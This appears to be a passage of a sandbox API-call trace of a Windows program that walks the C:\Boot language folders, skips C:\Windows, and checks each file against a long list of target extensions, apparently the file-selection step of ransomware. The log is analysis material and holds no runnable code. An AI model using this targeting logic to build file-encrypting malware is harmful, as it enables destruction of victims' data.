ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.988] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.988] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0032.988] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0032.988] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.988] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.988] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.988] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.989] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.989] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0032.989] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0032.989] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.989] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.989] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.989] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.989] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.989] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0032.989] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0032.989] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.989] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.989] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.989] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.990] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.990] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0032.990] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0032.990] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.990] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.990] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.990] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.990] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.990] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0032.990] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0032.990] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.990] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.990] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.990] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.991] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.991] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0032.991] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0032.991] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.991] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.991] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.991] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.991] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.991] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0032.991] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0032.991] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.991] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.991] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.991] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.992] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.992] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0032.992] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0032.992] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.992] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.992] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.992] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.992] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.992] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0033.046] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0033.046] lstrlenW (lpString="C:\\Boot\\tr-TR") returned 13 [0033.046] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Boot\\tr-TR") returned 1 [0033.046] lstrlenW (lpString="tr-TR") returned 5 [0033.046] lstrcmpiW (lpString1="C:\\Windows", lpString2="tr-TR") returned -1 [0033.047] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0033.047] lstrlenW (lpString="C:\\Boot\\tr-TR") returned 13 [0033.047] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0033.047] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.047] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.047] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0033.047] lstrlenW (lpString=".1cd") returned 4 [0033.047] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0033.047] lstrlenW (lpString=".3ds") returned 4 [0033.047] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0033.047] lstrlenW (lpString=".3fr") returned 4 [0033.047] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0033.047] lstrlenW (lpString=".3g2") returned 4 [0033.047] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0033.047] lstrlenW (lpString=".3gp") returned 4 [0033.047] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0033.047] lstrlenW (lpString=".7z") returned 3 [0033.047] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0033.047] lstrlenW (lpString=".accda") returned 6 [0033.047] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0033.047] lstrlenW (lpString=".accdb") returned 6 [0033.047] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0033.047] lstrlenW (lpString=".accdc") returned 6 [0033.047] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0033.047] lstrlenW (lpString=".accde") returned 6 [0033.047] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0033.047] lstrlenW (lpString=".accdt") returned 6 [0033.047] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0033.048] lstrlenW (lpString=".accdw") returned 6 [0033.048] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0033.048] lstrlenW (lpString=".adb") returned 4 [0033.048] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0033.048] lstrlenW (lpString=".adp") returned 4 [0033.048] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0033.048] lstrlenW (lpString=".ai") returned 3 [0033.048] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0033.048] lstrlenW (lpString=".ai3") returned 4 [0033.048] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0033.048] lstrlenW (lpString=".ai4") returned 4 [0033.048] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0033.048] lstrlenW (lpString=".ai5") returned 4 [0033.048] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0033.048] lstrlenW (lpString=".ai6") returned 4 [0033.048] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0033.048] lstrlenW (lpString=".ai7") returned 4 [0033.048] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0033.048] lstrlenW (lpString=".ai8") returned 4 [0033.048] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0033.048] lstrlenW (lpString=".anim") returned 5 [0033.048] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0033.048] lstrlenW (lpString=".arw") returned 4 [0033.048] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0033.048] lstrlenW (lpString=".as") returned 3 [0033.048] lstrcmpiW 